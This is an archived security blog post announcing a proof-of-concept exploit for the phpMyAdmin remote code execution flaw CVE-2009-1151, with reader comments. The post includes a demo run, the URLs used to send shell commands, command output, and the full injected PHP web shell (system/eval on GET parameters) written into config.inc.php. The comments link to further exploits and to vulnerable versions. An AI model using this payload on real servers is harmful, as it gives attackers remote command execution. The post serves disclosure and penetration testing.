CVE-2009-1151 phpMyAdmin Remote Code Execution Proof of Concept

Tue, 09 Jun 2009 19:03:13 GMT

by pagvac

I couldn't find any public PoC/exploit for this phpMyAdmin vulnerability, despite it being a serious bug affecting a popular open-source project. I think this vulnerability is a nice reminder that it's still possible to perform remote command execution these days without relying on SQL injection (i.e.: xp_cmdshell) or a memory corruption bug (i.e.: heap overflow).

All the documentation you need is in the script comments. I recommend you to go through it, before you actually run the script.

After reading the public advisory and patched code, and playing around for a while, I managed to have a working PoC bash script. The script will allow you to remotely run shell commands and PHP code against vulnerable targets. Although in principle the vulnerability sounds quite simple, it actually took me a while to go from advisory to working attack code.

I'm providing the script with the hope that it will help pentesters and security researchers. Please only test the script against your own systems, or systems you have been given permission to pentest! Don't be evil, it's not worth it.

Demo

$ ./phpMyAdminRCE.sh
usage: ./phpMyAdminRCE.sh <phpMyAdmin_base_URL>
i.e.: ./phpMyAdminRCE.sh http://target.tld/phpMyAdmin/

$ ./phpMyAdminRCE.sh http://172.16.211.10/phpMyAdmin-3.0.1.1/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/phpMyAdminRCE.sh.9217.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
    http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/
    http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?p=phpinfo();
    please send any feedback/improvements for this script to unknown.pentester<AT_sign_goes_here>gmail.com

$ curl "http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/"
total 96
drwxr-xr-x   2 root   root  4096 Mar 11 10:12 bin
drwxr-xr-x   3 root   root  4096 May  6 10:01 boot
lrwxrwxrwx   1 root   root    11 Oct 12  2008 cdrom -> media/cdrom
drwxr-xr-x  15 root   root 14300 Jun  5 09:02 dev
drwxr-xr-x 147 root   root 12288 Jun  5 09:02 etc
drwxr-xr-x   3 root   root  4096 Oct 18  2008 home
drwxr-xr-x   2 root   root  4096 Jul  2  2008 initrd
_[partial output removed for brevity reasons]_

Contents of /config/config.inc.php after our evil code has been successfully injected:

<?php
/*
 * Generated configuration file
 * Generated by: phpMyAdmin 3.0.1.1 setup script by Michal ÄŒihaÅ™ <michal@cihar.com>
 * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $
 * Date: Tue, 09 Jun 2009 14:13:34 GMT
 */

/* Servers configuration */
$i = 0;

/* Server  (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo
'';system($_GET['c']);echo '';}if($_GET['p']){echo
'';eval($_GET['p']);echo '';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';

/* End of servers configuration */

?>

Thanks

I'd like to thank Greg Ose for discovering such a cool vuln and doing a nice writeup about the technical details! Also big thanks to str0ke for testing this PoC script and providing such useful feedback!

Archived Comments

Alexander Sverdlov

PDP, you did it again... what could I say? Your bash'es are a teaching example that perl and python are not the only way to reach the target. Kudos!

pdp

Alexander, all the credits go to pagvac. He is the author of this post, not me. He is also a bash ninja :)

Mike

Nice Exploit. But there are plenty of awesome remote code execution vulns. Don't Forget mysql's into_outfile! Or Remote Code Execution with a Local File Include vulnerability! http://milw0rm.com/papers/260 using a .gif file: http://www.milw0rm.com/exploits/7947 Using apache log files: http://www.milw0rm.com/exploits/8298 Peace

å¢¨å°”æœ¬

This is some great script to deal with phpMyAdmin. Thanks for sharing.

pagvac

thanks for the feedback guys. btw, here are some vulnerable versions in case anyone wants to experiment with the script: http://sourceforge.net/project/downloading.php?group_id=23067&filename=phpMyAdmin-3.0.0-english.tar.gz&a=95960040 http://sourceforge.net/project/downloading.php?group_id=23067&filename=phpMyAdmin-3.0.1.1-english.tar.gz&a=95960040 http://sourceforge.net/project/downloading.php?group_id=23067&filename=phpMyAdmin-2.11.4-english.tar.gz&a=95960040 http://sourceforge.net/project/downloading.php?group_id=23067&filename=phpMyAdmin-2.11.9.3-english.tar.gz&a=95960040 http://sourceforge.net/project/downloading.php?group_id=23067&filename=phpMyAdmin-2.11.9.4-english.tar.gz&a=95960040

Jose Miguel Esparza

Hi there! Good PoC! I played with this vuln some weeks ago and I had had no time to write anything. It could be a good idea to add the vuln affecting the 3.1.3.1 version: http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php It's the same concept but change some files and functions (the setup page is /setup/config.php now, for example). The vulnerable package to play with: http://sourceforge.net/project/downloading.php?group_id=23067&filename=phpMyAdmin-3.1.3.1-all-languages.tar.gz Cheers!

pagvac

@Jose: thanks a lot for that. it should be quite simple to modify the PoC to exploit CVE-2009-1285. sweet! will give it a try if i have some free time and/or feel inspired :)